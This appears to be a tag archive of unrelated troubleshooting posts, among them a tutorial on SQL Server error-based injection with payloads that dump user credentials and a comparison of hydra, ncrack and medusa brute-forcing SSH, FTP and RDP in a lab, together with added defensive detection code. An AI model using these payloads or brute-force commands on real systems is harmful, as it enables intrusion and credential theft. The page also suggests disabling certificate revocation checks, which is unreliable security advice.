Tag Archives: security

Spring Security login fails with the error: There is no PasswordEncoder mapped for the id "null"

After writing a WebSecurityConfig class that extends WebSecurityConfigurerAdapter, we need to define authentication in the configure(AuthenticationManagerBuilder auth) method, which sets the source of user information and the password verification rules. (The name of the configure method does not matter; the official name seems to be configureGlobal(…). What matters is that the AuthenticationManagerBuilder is configured in a class annotated with @EnableWebSecurity, @EnableGlobalMethodSecurity or @EnableGlobalAuthentication.)

The source of authentication information I used at first was in-memory authentication. The code is as follows:

    protected void configure(AuthenticationManagerBuilder auth) throws Exception {
        // inMemoryAuthentication reads the users from memory
        auth.inMemoryAuthentication().withUser("user1").password("123456").roles("USER");
    }

The Spring Security login page is used. When logging in with the correct user name and password, the resource could not be opened and the browser stayed on the login page, with the error: There is no PasswordEncoder mapped for the id "null".

A search on Baidu showed that this is because Spring Security 5.0 added a variety of password encoding methods and also changed the password storage format.

Let's take a look at the official documents. Here are the original words of the official documents:

 

-------------------------------------------------------------------------------------------------------------------

The general format for a password is:

{id}encodedPassword

Such that id is an identifier used to look up which PasswordEncoder should be used and encodedPassword is the original encoded password for the selected PasswordEncoder. The id must be at the beginning of the password, start with { and end with }. If the id cannot be found, the id will be null. For example, the following might be a list of passwords encoded using different id. All of the original passwords are "password".

{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM/BG 
{noop}password 
{pbkdf2}5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc 
{scrypt}$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc=  
{sha256}97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0

-------------------------------------------------------------------------------------------------------------------

 

The storage format of passwords in Spring Security is "{id}encodedPassword". The id at the front names the encoding method, for example bcrypt or sha256, and is followed by the encoded password. In other words, when the program reads a stored password, it first looks for the id enclosed in "{" and "}" to determine how the rest was encoded. If no id is found, the id is treated as null. This is why our program reports the error: There is no PasswordEncoder mapped for the id "null". The example in the official documentation encodes the same original password, "password", with several different methods.
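The lookup described above can be modelled outside Spring. The following Python code is an added example, not code from the original post or from Spring Security: `split_id`, `matches`, `audit` and `DEMO_ENCODERS` are hypothetical names, `demo-pbkdf2` is a constructed stand-in encoder whose stored layout is invented here, and `legacy` is a made-up id that is deliberately absent from the registry.

```python
import hashlib
import hmac
import os

ERROR_FMT = 'There is no PasswordEncoder mapped for the id "{}"'


def split_id(stored):
    """Split '{id}encodedPassword'; the id is None when there is no {id} prefix."""
    if stored.startswith("{"):
        end = stored.find("}")
        if end != -1:
            return stored[1:end], stored[end + 1:]
    return None, stored


def noop_matches(raw, encoded):
    # {noop}: the stored value is the plaintext password itself
    return hmac.compare_digest(raw.encode(), encoded.encode())


def demo_pbkdf2_encode(raw, salt=None, rounds=100_000):
    # Constructed stand-in for a slow hash; NOT Spring's pbkdf2 or bcrypt layout
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", raw.encode(), salt, rounds)
    return f"{rounds}${salt.hex()}${digest.hex()}"


def demo_pbkdf2_matches(raw, encoded):
    rounds, salt_hex, digest_hex = encoded.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", raw.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)


# id -> matcher: the lookup that the {id} prefix drives (hypothetical registry)
DEMO_ENCODERS = {"noop": noop_matches, "demo-pbkdf2": demo_pbkdf2_matches}


def matches(raw, stored):
    """Check a submitted password against a stored '{id}encodedPassword' value."""
    enc_id, encoded = split_id(stored)
    matcher = DEMO_ENCODERS.get(enc_id)
    if matcher is None:
        raise ValueError(ERROR_FMT.format("null" if enc_id is None else enc_id))
    return matcher(raw, encoded)


def audit(store):
    """Classify stored values before they reach a login attempt."""
    findings = {}
    for user, stored in store.items():
        enc_id, _ = split_id(stored)
        if enc_id is None:
            findings[user] = "missing-id"   # login fails with the id "null" error
        elif enc_id not in DEMO_ENCODERS:
            findings[user] = "unmapped-id"  # same error, with the unknown id
        elif enc_id == "noop":
            findings[user] = "plaintext"    # logs in, but nothing is hashed
        else:
            findings[user] = "ok"
    return findings


# Constructed sample store; user1 mirrors .password("123456") from the failing configure()
SAMPLE_STORE = {
    "user1": "123456",
    "user2": "{noop}123456",
    "user3": "{demo-pbkdf2}" + demo_pbkdf2_encode("123456", salt=bytes(16), rounds=1000),
    "user4": "{legacy}abc123",
}

if __name__ == "__main__":
    for user, finding in audit(SAMPLE_STORE).items():
        print(user, finding)
```

Running `audit` over an export of stored passwords shows which accounts would hit the error at login and which are stored as plaintext.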

 

For our project to log in normally, we need to modify the code in configure so that the password submitted from the front end is encoded in some way. Spring Security officially recommends bcrypt. So how do we encode the password? Just specify it in the configure method.

After modification, it looks like this:

 
    protected void configure(AuthenticationManagerBuilder auth) throws Exception {
        // inMemoryAuthentication reads the users from memory; the login check and
        // the stored password both use bcrypt
        auth.inMemoryAuthentication()
            .passwordEncoder(new BCryptPasswordEncoder())
            .withUser("user1").password(new BCryptPasswordEncoder().encode("123456")).roles("USER");
    }

After inMemoryAuthentication() there is now ".passwordEncoder(new BCryptPasswordEncoder())", which means the password submitted at login is processed with bcrypt. The earlier ".password("123456")" becomes ".password(new BCryptPasswordEncoder().encode("123456"))", which means the password held in memory is bcrypt-encoded. When the two match, the password is correct and login is allowed.

If you are also using in-memory users, the modification above should let you log in successfully.

If you store user names and passwords in a database, you usually encode each user's password with bcrypt before storing it. Then modify the configure() method and add ".passwordEncoder(new BCryptPasswordEncoder())" so that the password submitted at login is processed with bcrypt and compared with the password in the database, as follows:

 
    // inject the UserDetailsService implementation class
    auth.userDetailsService(userService).passwordEncoder(new BCryptPasswordEncoder());
     

Reprinted from https://blog.csdn.net/canon_in_d_major/article/details/79675033

Solution for ServerNotRunningYetException in HBase

I encountered a ServerNotRunningYetException error while working today. The symptom is that entering the HBase shell works normally, but this error is thrown when executing any command.

There was no error message when checking the log. At first I thought an HBase process was not up, but the jps command showed that everything had started.

It's a little tricky. Because the test server was restarted a few days ago, and then I did some other work on it, I suspected that the problem was a port conflict. However, that was not it either.

I had no choice, so I brought out the ultimate solution: reinstalling Hadoop and HBase. After the official configuration was completed, HBase was miraculously fine.

I once suspected that it was my configuration. However, that was not it either.

Finally I found a solution on the Internet: Hadoop was in safe mode, so HBase operations were abnormal. I'm not sure how it works. The solution is to exit safe mode manually:

./hadoop dfsadmin -safemode leave 

Then restart HBase and the problem is solved.

Uncaught Error: Call to undefined function mysql_connect() when building the sqli-labs environment with PHPStudy

The problem

Uncaught Error: Call to undefined function mysql_connect()

Why
In PHP 5.x, both mysql_connect() and mysqli_connect() are available; in PHP 7, mysql_connect() has been removed and only mysqli_connect() can be used.
The solution
In the PHPStudy environment, you can downgrade PHP by selecting a PHP 5 version:

Website -> Management -> PHP version. (You can also switch to an older version of PHPStudy.)
If you want to use PHP 7 without changing the code, go to Management -> PHP extensions and check the box next to php_mysql.

12 - Web security: error-based injection in SQL Server (and, convert, cast)

SQL Server, developed by Microsoft, is a very good database whose error messages pinpoint the problem precisely. This is very developer friendly, and it also matters to web security testers, who can use SQL Server error information in a penetration test of the target system.

id=1' and 1=(@@version)--+

When the SQL statement executes, the database treats the contents of the parentheses in 1=(@@version) as an int. However, @@version itself is a string of type nvarchar, so SQL Server fails to convert the nvarchar value to int and reports an error.

SQL Server error-based injection relies on data type conversion errors. A character value is converted to a numeric type, but its content is still characters, so the database cannot convert it and raises an error. The error message also includes the value returned by the query, so information such as the database version is returned to the page as part of the error message.

For example, you can construct a SQL statement that uses the error to query the table names in the current database:

id=1' and 1=(select top 1 table_name from information_schema.tables)--+


Note that because the = sign precedes the parentheses and the SELECT statement would return more than one row, you need the top clause to limit the query to one result, which is displayed on the web page through the error; the following table names are then queried with top n.
 
 
You can also use the FOR XML PATH and the QUOTENAME statement to display the result as a single line to construct the SQL statement:

select quotename(table_name) from information_schema.tables for xml path('')

 
 
Query the column names of the users table:

select quotename(column_name) from information_schema.columns where table_name='users' for xml path('')

 
Query the usernames and passwords in the users table:

select username,':',password,'|' from users for xml path('')

 
Usually the page cannot display all the usernames and passwords because of a limit on the number of characters displayed. The substring function can be used to display the query result in segments, here starting from the first character and displaying 250 characters:

select substring((select username,':',password,'|' from users for xml path('')),1,250)

SQL Server databases use the Substring function in the same way as MySQL does.
 
 
Select * from users where user = ‘users’;

 
 

Error injection based on the convert and cast functions.

The convert function converts a date/time value to a given data type (format). Its form is:

convert(data_type(length),data_to_be_converted,style)

Parameters of the convert function:
data_type(length): the target data type; length is an optional length
data_to_be_converted: the time, that is, the value to be converted
style: the output format of the date/time

Example of the convert function:

varchar(20) defines the data type as varchar with a length of 20, getdate() gets the current time, and 111 outputs the time in year/month/day format (for example 2020/07/11).

An error occurs if the convert function is asked to convert the database name to an int (as in the SQL statement select convert(int, db_name(), 111)), and the error exposes the name of the database.
 
 
Error injection based on the convert function:

id=1' and 1=convert(int,db_name(),111) --+


In the SQL statement above, the convert function attempts to convert the result of its second parameter, db_name(), to the int type. Because db_name() returns nvarchar, SQL Server cannot convert the value to int, so convert raises an error, and the result of the second parameter appears in the error message.

The cast function converts one data type to another:

cast(expression as data_type)

Parameters of the cast function:
expression: any valid SQL Server expression
as: separates the two parameters. The parameter before as (expression) is the data to be processed, and the parameter after as (data_type) is the data type to convert to
data_type: a data type supplied by the target system, including bigint and sql_variant; user-defined data types cannot be used

The cast function can be used, for example, to convert 123456 to int.

If the cast function is asked to convert the database name to an int, the resulting error reveals the database name.

 
 
 
Error injection based on CAST function:

id=1' and 1=cast(host_name() as int) --+


 
 
Query the table names from sysobjects:

select quotename(name) from sysobjects where xtype='u' for xml path('')


 
 
Query the column names of the users table:

select quotename(name) from syscolumns where id=(select id from sysobjects where name='users' and xtype='u') for xml path('')


 
 
 
Query the usernames and passwords in the users table:

select substring((select username,':',password,'|' from users for xml path('')),1,250)


 
In addition to displaying the usernames and passwords piece by piece with the substring function, you can also display them one at a time using the exclusion method.
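On the defensive side, each technique in this article leaves a recognizable shape in the request's query string. The following Python code is an added example, not part of the original article: it URL-decodes access-log lines and flags the patterns described above. The rule names, the log layout, the /item.aspx path and the sample lines are assumptions constructed for the illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Access-log layout assumed for this example (common log format)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One rule per technique described in the article (rule names are made up here)
RULES = {
    "compare-int-to-subquery": re.compile(r"\b1\s*=\s*\(\s*(?:@@\w+|select\b)", re.I),
    "convert-to-int": re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "cast-as-int": re.compile(r"\bcast\s*\(.+?\bas\s+int\s*\)", re.I),
    "for-xml-path": re.compile(r"\bfor\s+xml\s+path\b", re.I),
    "catalog-lookup": re.compile(
        r"\b(?:information_schema\.(?:tables|columns)|sysobjects|syscolumns)\b", re.I),
}


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input is inspected in its final form."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(lines):
    """Return one finding per log line whose query string matches any rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = fully_decode(urlsplit(m.group("target")).query)
        hits = [name for name, rx in RULES.items() if rx.search(query)]
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "rules": hits,
                # a 5xx reply suggests the conversion error reached the client
                "server_error": int(m.group("status")) >= 500,
            })
    return findings


# Constructed sample lines; the encoded values are the statements quoted in the article
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jul/2020:10:00:01 +0000] "GET /item.aspx?id=1 HTTP/1.1" 200 512',
    '192.0.2.44 - - [11/Jul/2020:10:00:05 +0000] '
    '"GET /item.aspx?id=1%27+and+1%3D%28%40%40version%29--+ HTTP/1.1" 500 1893',
    '192.0.2.45 - - [11/Jul/2020:10:00:09 +0000] '
    '"GET /item.aspx?id=1%27+and+1%3Dconvert%28int%2Cdb_name%28%29%2C111%29+--+ HTTP/1.1" 500 1720',
    '192.0.2.46 - - [11/Jul/2020:10:00:12 +0000] '
    '"GET /item.aspx?id=1%2527%2520and%25201%253Dcast%2528host_name%2528%2529%2520as%2520int%2529'
    ' HTTP/1.1" 200 498',
    '192.0.2.47 - - [11/Jul/2020:10:00:15 +0000] '
    '"GET /item.aspx?id=1%27+and+1%3D%28select+top+1+table_name+from+'
    'information_schema.tables%29--+ HTTP/1.1" 500 1655',
    '192.0.2.11 - - [11/Jul/2020:10:00:20 +0000] '
    '"GET /search?q=how+to+convert+varchar+to+int HTTP/1.1" 200 2040',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A match together with `server_error` set means the conversion error was probably returned to the client, which is what the technique depends on; returning a generic error page and using parameterized queries removes that channel.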
 

Brute Forcing Passwords with ncrack, hydra and medusa

https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/

Let's test some password breaking tools. Passwords are often the weakest link in any system. Testing for weak passwords is an important part of security assessments.
I am going to focus on tools that allow remote service brute forcing. These are typically Internet facing services that are accessible from anywhere in the world. Another type of password brute forcing is attacks against the password hash, using tools such as Hashcat, a powerful tool that is able to crack encrypted password hashes on a local system.
The three tools I will assess are Hydra, Medusa and Ncrack (from nmap.org).
Installation of all three tools was straightforward on Ubuntu Linux.

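wget https://nmap.org/ncrack/dist/ncrack-0.5.tar.gz
tar -xzf ncrack-0.5.tar.gz
cd ncrack-0.5
./configure
make
make install
cd ..

wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
tar -xzf hydra-6.3-src.tar.gz
cd hydra-6.3-src
./configure
make
make install
cd ..

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
tar -xzf medusa-2.0.tar.gz
cd medusa-2.0
./configure
make
make install
cd ..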

Then I grabbed a list of 500 passwords from skullsecurity.org. Of course you can find password lists with many thousands or even millions of passwords. You will need to choose what is most appropriate for your password testing, as target type and rate of testing will be major factors.

wget http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt

This testing was performed against a Linux Virtual Machine running on Virtualbox.
The first series of tests was against SSH. I set the root account with the password toor. I added toor to the end of the 500 password list at number 499.

~# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser/THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-05 16:45:19
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 185.00 tries/min, 185 tries in 00:01h, 315 todo in 00:02h
[STATUS] 183.00 tries/min, 366 tries in 00:02h, 134 todo in 00:01h
[22][ssh] host: 10.10.10.10   login: root   password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-05 16:48:08

Successfully found the password with Hydra!

~# ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-05 16:50 EST
Stats: 0:00:18 elapsed; 0 services completed (1 total)
Rate: 0.09; Found: 0; About 6.80% done; ETC: 16:54 (0:04:07 remaining)
Stats: 0:01:46 elapsed; 0 services completed (1 total)
Rate: 3.77; Found: 0; About 78.40% done; ETC: 16:52 (0:00:29 remaining)

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 138.03 seconds.

Ncrack finished.

Successfully found the password with Ncrack!

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

~ 1500 seconds
Success again with Medusa, however it took over 10 times as long with the default settings of each tool.
Let's try and speed things up a bit. Cranking up Medusa speed to use 5 concurrent logins fails with the following error:

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mustang (7 of 500 complete)
medusa: ath.c:193: _gcry_ath_mutex_lock: Assertion `*lock == ((ath_mutex_t) 0)' failed.
Aborted

Trying Ncrack at a faster rate was a bit faster but not much.

ncrack -p ssh -u root -P 500-worst-passwords.txt -T5 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 09:04 EST

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 128.98 seconds.

Ncrack finished.

Is Hydra any faster? Here I added the option for 32 threads.

$ hydra -t 32 -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser/THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 12:44:03
[DATA] 32 tasks, 1 servers, 500 login tries (l:1/p:500), ~15 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 184.00 tries/min, 184 tries in 00:01h, 316 todo in 00:02h
[STATUS] 185.50 tries/min, 371 tries in 00:02h, 129 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
[22][ssh] host: 10.10.10.10   login: root   password: toor
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 12:46:57

No change really. Perhaps the limiting factor for Hydra and Ncrack is the speed of response from the VirtualBox machine. Either way it appears the default speed is pretty good for both tools.
Now to try hitting the FTP server on the same host (vsftpd).

ncrack -u test -P 500-worst-passwords.txt 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:53 EST
Stats: 0:00:40 elapsed; 0 services completed (1 total)
Rate: 5.94; Found: 0; About 47.20% done; ETC: 12:54 (0:00:45 remaining)
Stats: 0:00:59 elapsed; 0 services completed (1 total)
Rate: 6.93; Found: 0; About 88.00% done; ETC: 12:54 (0:00:08 remaining)

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 69.01 seconds.

Attempting to push it faster….

$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:55 EST
Stats: 0:00:03 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done
Stats: 0:00:06 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 66.01 seconds.

Same result. Limiting factor is likely the VM.

$ hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
Hydra v6.3 (c) 2011 by van Hauser/THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 13:07:43
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ftp on port 21

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

[STATUS] 219.00 tries/min, 219 tries in 00:01h, 281 todo in 00:02h
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
[STATUS] 233.06 tries/min, 470 tries in 00:02h, 30 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 13:09:56

Oops, did we crash the FTP service?
Now testing with Medusa.

~$ medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks 

ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: password (2 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 12345678 (3 of 500 complete)
ERROR: [ftp.mod] failed: medusaReceive returned no data. Server may have dropped connection due to lack of encryption. Enabling the EXPLICIT mode may help.
CRITICAL: Unknown ftp.mod module state -1

Medusa also appears to be struggling.
Let's go back and check again with ncrack to ensure the service is still ok.

~$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:14 EST

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 62.99 seconds.

Ncrack finished.

ncrack for the win!
ncrack has the ability to also brute force RDP accounts. So let's now hit a Windows box with Microsoft Remote Desktop Protocol enabled.

$ ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:26 EST
Stats: 0:02:18 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 3.40% done; ETC: 14:33 (1:05:21 remaining)
Stats: 0:15:07 elapsed; 0 services completed (1 total)
Rate: 0.20; Found: 0; About 13.80% done; ETC: 15:15 (1:34:25 remaining)
Stats: 0:22:19 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 19.40% done; ETC: 15:21 (1:32:43 remaining)
Stats: 0:24:46 elapsed; 0 services completed (1 total)

Discovered credentials for rdp on 10.212.50.21 3389/tcp:
10.212.50.21 3389/tcp rdp: 'administrator' 'toor'

Ncrack done: 1 service scanned in 6072 seconds.

Protocols supported include:

Hydra - TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa - AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form

Ncrack - RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

There is much more that could be tested for a more comprehensive review: other protocols, different targets, latency and further tweaking of the scan speeds and threads.
While ncrack has limited protocol support compared to Hydra and Medusa, the only conclusion for this little test is: when it comes to speed, reliability and the ability to hit RDP services, ncrack wins!!
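Seen from the target, the SSH runs above are a burst of failed logins from one source, at roughly three attempts per second, followed by a success. The following Python code is an added example, not part of the original post: it finds that pattern in sshd log lines with a sliding window. The log layout, the source addresses, the threshold of 20 failures per 60 seconds and the sample generated by `build_sample` are assumptions constructed for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH password-auth messages in classic syslog layout (assumed for this example)
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse(line, year):
    """Return (timestamp, result, user, source) or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    stamp = " ".join(m.group("ts").split())  # collapse the padded day ("May  5")
    ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")  # syslog has no year
    return ts, m.group("result"), m.group("user"), m.group("src")


def detect(lines, year=2011, threshold=20, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failed logins inside the sliding window."""
    recent = defaultdict(deque)  # source -> timestamps of failures still in the window
    report = {}
    for line in lines:
        event = parse(line, year)
        if event is None:
            continue
        ts, result, user, src = event
        failures = recent[src]
        while failures and ts - failures[0] > window:
            failures.popleft()
        if result == "Failed":
            failures.append(ts)
            if len(failures) >= threshold:
                entry = report.setdefault(
                    src, {"first_alert": ts, "peak": 0, "login_after_burst": None})
                entry["peak"] = max(entry["peak"], len(failures))
        elif src in report and failures:
            # a success while the burst is still in the window: a guessed password
            report[src]["login_after_burst"] = user
    return report


def build_sample():
    """Constructed log: one guessing run ending in a login, plus one ordinary user."""
    def line(ts, result, user, src, port):
        stamp = f"{ts:%b} {ts.day:>2} {ts:%H:%M:%S}"
        return (f"{stamp} vm sshd[2101]: {result} password for {user} "
                f"from {src} port {port} ssh2")

    start = datetime(2011, 5, 5, 16, 45, 19)
    # 45 failures at three per second, close to the ~185 tries/min Hydra reported
    lines = [line(start + timedelta(seconds=i // 3), "Failed", "root", "10.10.10.5", 40000 + i)
             for i in range(45)]
    lines.append(line(start + timedelta(seconds=15), "Accepted", "root", "10.10.10.5", 40045))
    # one mistyped password followed by a normal login from another host
    lines.append(line(start + timedelta(seconds=20), "Failed", "alice", "10.10.10.77", 51000))
    lines.append(line(start + timedelta(seconds=25), "Accepted", "alice", "10.10.10.77", 51001))
    return lines


if __name__ == "__main__":
    for src, entry in detect(build_sample()).items():
        print(src, entry)
```

A source that ends up with `login_after_burst` set is the case that needs immediate attention: the account's password was in the list, so it should be reset and the session reviewed.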

Http Error 12057 (Bug Fix Note)

A bug has been reported in the product that occurs only on one specific platform, Windows Server 2003 Standard Edition.
Checking the trace log showed that the wrapper class around the WinINet call returns error 12057, with the following details:

ERROR_WINHTTP_SECURE_CERT_REV_FAILED

12057

Indicates that revocation cannot be checked because the revocation server was offline (equivalent to CRYPT_E_REVOCATION_OFFLINE).
Open
IE -> Tools -> Internet Options -> Advanced tab -> Security -> "Check for server certificate revocation (requires restart)"

This option was selected. Clearing it made the bug symptoms disappear. Only IE on Windows Server 2003 Standard Edition has it checked by default, and error 12057 does not occur when the option is checked on other platforms (a Microsoft bug, or an interaction with other options?). We decided to solve the problem in code.
The code to solve this problem is quite simple. Add the following code after HttpOpenRequest to set the security flags of the current HTTP request so that this check is skipped. SECURITY_FLAG_IGNORE_REVOCATION turns off revocation checking for this request, so a revoked server certificate will be accepted on it.

    DWORD dwFlags = 0;
    DWORD dwError = 0;
    DWORD dwBuffLen = sizeof(dwFlags);
    // read the current security flags of the request handle
    InternetQueryOption(m_hRequest, INTERNET_OPTION_SECURITY_FLAGS,
                        (LPVOID)&dwFlags, &dwBuffLen);
    // skip the certificate revocation check for this request
    dwFlags |= SECURITY_FLAG_IGNORE_REVOCATION;
    InternetSetOption(m_hRequest, INTERNET_OPTION_SECURITY_FLAGS,
                      (LPVOID)&dwFlags, sizeof(dwFlags));

Infragistics NetAdvantage 2006 Vol. 2: error 1609 solution

Description:
error 1609,an error occurred while applying security settings.
aspnet is not a valid user or group.this could be a problem with the package,or a problem connecting to a domain controller on the network.check your network connection and click retry,or cancel to end the install.
Error 1609
Error applying security settings. The user is not a valid user or group. This could be due to a problem with the package or a problem connecting to a domain controller on the network.
Simply put, the ASPNET user does not exist or the domain in which the user resides has a problem. If the user doesn't exist, create a user named ASPNET; if it does, it could be a domain problem.
I encountered a situation where the user already existed. Solution: right-click "My Computer" and choose "Manage", disable and then enable the ASPNET user, and add it to the Administrators group. The installation then passes.

passwd: Authentication token manipulation error in Linux

If, on Linux, the error "passwd: Authentication token manipulation error" appears whenever root or an ordinary user changes a password, here is the solution:
root itself fails to change the password

An ordinary user fails to change the password

1. This error (passwd: Authentication token manipulation error) is usually caused by the permissions of the password files, but it may also be that the root filesystem is full.

Using the lsattr command to view the attributes of the files that hold the users and passwords, you find the i attribute (i: the file or directory cannot be modified). As a result, no user can change a password, because there is no permission to modify these files.
2. We need to use the chattr command to remove the i attribute, and then changing the password works.

3. Then test changing the passwords of root and the user xiaogang.
Test changing the root password

Test changing the xiaogang user's password

4. For security reasons, after changing the password it is better to protect the files where the users and passwords are stored again,
that is, run chattr +i /etc/passwd and chattr +i /etc/shadow.
5. When ordinary users change their own passwords, there are requirements: the password must be complex, and it is checked against the password dictionary.

SOAP security negotiation failed

1. Background: the service runs on the server and the client program cannot access it, although the service can be called normally using WCFTestClient.

2. Exception message: SOAP security negotiation with ‘HTTP… ‘ for target ‘http… ‘ failed.
3. Solutions:
A. Find the following information in the client configuration file:

